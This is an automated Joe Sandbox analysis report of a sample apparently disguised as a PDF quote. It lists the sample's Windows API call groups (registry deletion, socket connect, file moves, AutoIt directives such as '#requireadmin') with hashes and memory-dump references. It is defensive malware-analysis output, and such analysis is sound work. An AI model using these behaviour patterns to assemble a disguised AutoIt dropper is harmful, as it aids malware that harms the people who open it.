                                                                    • String ID: ,,$DllGetClassObject
                                                                    • API String ID: 753597075-2867008933
                                                                    • Opcode ID: f8ae4641ed440c729f319b21cd36f80da668a02ab3e3715ae786fb640b1faf4e
                                                                    • Instruction ID: 021c3fa96328e3546ae31add7bc7a426de5aa80e50db266d00ef493970266b3d
                                                                    • Opcode Fuzzy Hash: f8ae4641ed440c729f319b21cd36f80da668a02ab3e3715ae786fb640b1faf4e
                                                                    • Instruction Fuzzy Hash: 49418C71604608EFDB05DF55CCC4ADBBBB9EF89314B1190A9E905AF206E7B1DD44CBA0
                                                                    APIs
                                                                      • Part of subcall function 00EC46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EC36DB,?), ref: 00EC46CC
                                                                      • Part of subcall function 00EC46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EC36DB,?), ref: 00EC46E5
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00EC36FB
                                                                    • _wcscmp.LIBCMT ref: 00EC3717
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00EC372F
                                                                    • _wcscat.LIBCMT ref: 00EC3777
                                                                    • SHFileOperationW.SHELL32(?), ref: 00EC37E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 1377345388-1173974218
                                                                    • Opcode ID: da94316f53e5f05e6d18b5b27fb3750766740bed429c0ad2f28f28487867cfae
                                                                    • Instruction ID: 88e80d918d0fb6a7bf6f4785187d60ac92cf34c75344982252550982d66b1742
                                                                    • Opcode Fuzzy Hash: da94316f53e5f05e6d18b5b27fb3750766740bed429c0ad2f28f28487867cfae
                                                                    • Instruction Fuzzy Hash: C2419FB21083849EC751EF64D541EDFB7E8EF88380F00692EB489E3191EA35D78AC756
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EE72DC
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE7383
                                                                    • IsMenu.USER32(?), ref: 00EE739B
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EE73E3
                                                                    • DrawMenuBar.USER32 ref: 00EE73F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                    • String ID: 0
                                                                    • API String ID: 3866635326-4108050209
                                                                    • Opcode ID: 6c4e549c6d7be691fabfeafbad0254127499491645f2befe9c9dd3060e175cc4
                                                                    • Instruction ID: 02fa6d45d91968a921d6cba8a8412c42ed6cc707a4f1a653f5086b6ad4b996c6
                                                                    • Opcode Fuzzy Hash: 6c4e549c6d7be691fabfeafbad0254127499491645f2befe9c9dd3060e175cc4
                                                                    • Instruction Fuzzy Hash: CD415B70A0424CEFDB21DF51E884A9ABBF5FB04318F049029FD55AB2A0D730AD05DF91
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EE105C
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EE1086
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00EE113D
                                                                      • Part of subcall function 00EE102D: RegCloseKey.ADVAPI32(?), ref: 00EE10A3
                                                                      • Part of subcall function 00EE102D: FreeLibrary.KERNEL32(?), ref: 00EE10F5
                                                                      • Part of subcall function 00EE102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EE1118
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EE10E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 395352322-0
                                                                    • Opcode ID: 9c8699edd47539690709c8408ad6b4fe6cc06234efaf16e71762273fbc70df8a
                                                                    • Instruction ID: 48ff899c52c4f5970584d4bb5cca910f2f2fa51188beeeebe41578c60e5118d4
                                                                    • Opcode Fuzzy Hash: 9c8699edd47539690709c8408ad6b4fe6cc06234efaf16e71762273fbc70df8a
                                                                    • Instruction Fuzzy Hash: 01313C7190114DBFDB15DB91DC89AFEB7BCEB08304F0001A9F501B2151DA709F899AA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EE631E
                                                                    • GetWindowLongW.USER32(017C64C8,000000F0), ref: 00EE6351
                                                                    • GetWindowLongW.USER32(017C64C8,000000F0), ref: 00EE6386
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EE63B8
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EE63E2
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00EE63F3
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EE640D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: 48330fec93c632c9b57fde7f69ee2b0015aebac08dee4de6f5ca8b625cb62f2a
                                                                    • Instruction ID: ac542340ae3ee5674e8b6c32f41b2c356b0f439e01da58aad3d1fc16795979cf
                                                                    • Opcode Fuzzy Hash: 48330fec93c632c9b57fde7f69ee2b0015aebac08dee4de6f5ca8b625cb62f2a
                                                                    • Instruction Fuzzy Hash: 273136306042899FDB20CF1ADC84F5837E1FBA9754F181164F510EF2B2CB71A845DB51
                                                                    APIs
                                                                      • Part of subcall function 00ED7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00ED7ECB
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00ED62DC
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00ED62EB
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00ED6324
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00ED632D
                                                                    • WSAGetLastError.WSOCK32 ref: 00ED6337
                                                                    • closesocket.WSOCK32(00000000), ref: 00ED6360
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00ED6379
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 910771015-0
                                                                    • Opcode ID: 73c5793588f6b2781ef675d48e5d611989eba94366a508bd0b1107636c6260d7
                                                                    • Instruction ID: 35e52b883c79730e9098b6fac53e976f1aa5c9830d7820d03bfc160c944d54e1
                                                                    • Opcode Fuzzy Hash: 73c5793588f6b2781ef675d48e5d611989eba94366a508bd0b1107636c6260d7
                                                                    • Instruction Fuzzy Hash: 0131C431600118AFDB109F64DC85BBE77EDEB84764F04502AFD45BB391DB70AC098BA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: 0bcdb52a38f76d0e30fe6b025f0adae8487621156d1efb1774163874793c25a8
                                                                    • Instruction ID: c4fd877fccb3a84c4f754633c7f710e1708515227c61cb60cfb0c7ecc8e43d4e
                                                                    • Opcode Fuzzy Hash: 0bcdb52a38f76d0e30fe6b025f0adae8487621156d1efb1774163874793c25a8
                                                                    • Instruction Fuzzy Hash: BF216B322082117AD235BA359C02FF773D8DF91718F50A039F98EB7182EB919D42C391
                                                                    APIs
                                                                      • Part of subcall function 00E61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E61D73
                                                                      • Part of subcall function 00E61D35: GetStockObject.GDI32(00000011), ref: 00E61D87
                                                                      • Part of subcall function 00E61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E61D91
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EE7664
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EE7671
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EE767C
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EE768B
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EE7697
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: 2c2a3556bcfee4bfdcc218cadf7f96f9723a288f713b457ec018d98088f522a1
                                                                    • Instruction ID: ca210e7b10c7be910f55437ed42e2d90afa82e08e26677d3eed5c7f0458b5f58
                                                                    • Opcode Fuzzy Hash: 2c2a3556bcfee4bfdcc218cadf7f96f9723a288f713b457ec018d98088f522a1
                                                                    • Instruction Fuzzy Hash: 2411B2B215021EBFEF119F65DC85EE77F6DEF08798F015115BA44A6090C672AC21DBA0
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E841D2,?), ref: 00E84123
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00E8412A
                                                                    • EncodePointer.KERNEL32(00000000), ref: 00E84136
                                                                    • DecodePointer.KERNEL32(00000001,00E841D2,?), ref: 00E84153
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                    • String ID: RoInitialize$combase.dll
                                                                    • API String ID: 3489934621-340411864
                                                                    • Opcode ID: 1b5cdec3a672984a1a8a9d05f095b6ce9b81d90a69aa74a8c7b3750ec917cac8
                                                                    • Instruction ID: bdd5ad014c0388d3f7860336ca4ffb1e2e17ba4fa91e1109bb68367b06e8d0ea
                                                                    • Opcode Fuzzy Hash: 1b5cdec3a672984a1a8a9d05f095b6ce9b81d90a69aa74a8c7b3750ec917cac8
                                                                    • Instruction Fuzzy Hash: FCE012B0B9134DAFDB206FB1EC4DB143595A755B06F509438F615F90F0CBB941559F00
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E840F8), ref: 00E841F8
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00E841FF
                                                                    • EncodePointer.KERNEL32(00000000), ref: 00E8420A
                                                                    • DecodePointer.KERNEL32(00E840F8), ref: 00E84225
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                    • String ID: RoUninitialize$combase.dll
                                                                    • API String ID: 3489934621-2819208100
                                                                    • Opcode ID: 758bfebfee5e16c78e9082aef3f5405173bf64448ed98ac5fa51e57d113d1d2e
                                                                    • Instruction ID: 76f33ee34d9b02258c71e3f2fb62f622deaca0c3cb8998c19b2a5c6be2a331e4
                                                                    • Opcode Fuzzy Hash: 758bfebfee5e16c78e9082aef3f5405173bf64448ed98ac5fa51e57d113d1d2e
                                                                    • Instruction Fuzzy Hash: 9DE0BFF0A8534D9FDB209B62EC4DB1436A4F708746F105028F615F50F0CBBB4615EB14
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 3253778849-0
                                                                    • Opcode ID: d291a163a2c2f10870e166396bad4e6851f931b3e1eadcfa5819d62466f8ceab
                                                                    • Instruction ID: 42dbe2a586f08e8e616c47e27d1068ecb57a6801f5d60181cf0275ff80db506b
                                                                    • Opcode Fuzzy Hash: d291a163a2c2f10870e166396bad4e6851f931b3e1eadcfa5819d62466f8ceab
                                                                    • Instruction Fuzzy Hash: D6619B3060065A9BCF11EF20D982FFE77E8AF44348F046959F9597B192DB35AD06CB90
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00EE0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EDFE38,?,?), ref: 00EE0EBC
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EE0348
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EE0388
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EE03AB
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EE03D4
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EE0417
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EE0424
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                    • String ID:
                                                                    • API String ID: 4046560759-0
                                                                    • Opcode ID: ad7b2c5a688c650d96929bc47d0cde61186364c0a3d0aa355c77734b3f4c924c
                                                                    • Instruction ID: d2a39bf3554ab5e330b22dea3898cacd2777e66f2e6f0a416246d2309b12d92a
                                                                    • Opcode Fuzzy Hash: ad7b2c5a688c650d96929bc47d0cde61186364c0a3d0aa355c77734b3f4c924c
                                                                    • Instruction Fuzzy Hash: 8E519931208244AFC714EF65D885E6FBBE8FF88314F04581DF595A72A2DB71E944CB52
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00EE5864
                                                                    • GetMenuItemCount.USER32(00000000), ref: 00EE589B
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EE58C3
                                                                    • GetMenuItemID.USER32(?,?), ref: 00EE5932
                                                                    • GetSubMenu.USER32(?,?), ref: 00EE5940
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00EE5991
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                    • String ID:
                                                                    • API String ID: 650687236-0
                                                                    • Opcode ID: 44679ace588a2cf9e08081fac26fe7bcb955f8f0912f0fafec2df9f000a16ee4
                                                                    • Instruction ID: d92891892074cd2cee173190a4b8a1e4b74a785004ec5b9a127eb15bd0716c41
                                                                    • Opcode Fuzzy Hash: 44679ace588a2cf9e08081fac26fe7bcb955f8f0912f0fafec2df9f000a16ee4
                                                                    • Instruction Fuzzy Hash: 6A518032A00619EFCF15EFA5C845AEEB7F4EF88324F145069E915BB351CB71AE418B90
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00EBF218
                                                                    • VariantClear.OLEAUT32(00000013), ref: 00EBF28A
                                                                    • VariantClear.OLEAUT32(00000000), ref: 00EBF2E5
                                                                    • _memmove.LIBCMT ref: 00EBF30F
                                                                    • VariantClear.OLEAUT32(?), ref: 00EBF35C
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EBF38A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                    • String ID:
                                                                    • API String ID: 1101466143-0
                                                                    • Opcode ID: e8615d63d2aa51bb44ff2b08ba61f11e8a6ac9c81c7cf9fbe0499b7c9fbca511
                                                                    • Instruction ID: daaba3475ff7769bd34c81ef6166b341efda9c203b88d59ffc2b6ad7e369eb7c
                                                                    • Opcode Fuzzy Hash: e8615d63d2aa51bb44ff2b08ba61f11e8a6ac9c81c7cf9fbe0499b7c9fbca511
                                                                    • Instruction Fuzzy Hash: AB5127B5A00209EFDB14CF58C884AAAB7F8FF4C314B158569F959EB341D730E955CBA0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EC2550
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC259B
                                                                    • IsMenu.USER32(00000000), ref: 00EC25BB
                                                                    • CreatePopupMenu.USER32 ref: 00EC25EF
                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00EC264D
                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EC267E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                    • String ID:
                                                                    • API String ID: 3311875123-0
                                                                    • Opcode ID: b6679c00938c116bd546ba8924a013822c63777689f310c8fa540d4ff30dc797
                                                                    • Instruction ID: 7dd1e433b7801bdb4ede43485457fadc138bf123a79a4619075019fd2a082f4d
                                                                    • Opcode Fuzzy Hash: b6679c00938c116bd546ba8924a013822c63777689f310c8fa540d4ff30dc797
                                                                    • Instruction Fuzzy Hash: E8519170600249DFCF20DF68DA84FAEBBF4AF54318F14515DEA11BB290DB729906CB61
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E6179A
                                                                    • GetWindowRect.USER32(?,?), ref: 00E617FE
                                                                    • ScreenToClient.USER32(?,?), ref: 00E6181B
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E6182C
                                                                    • EndPaint.USER32(?,?), ref: 00E61876
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 1827037458-0
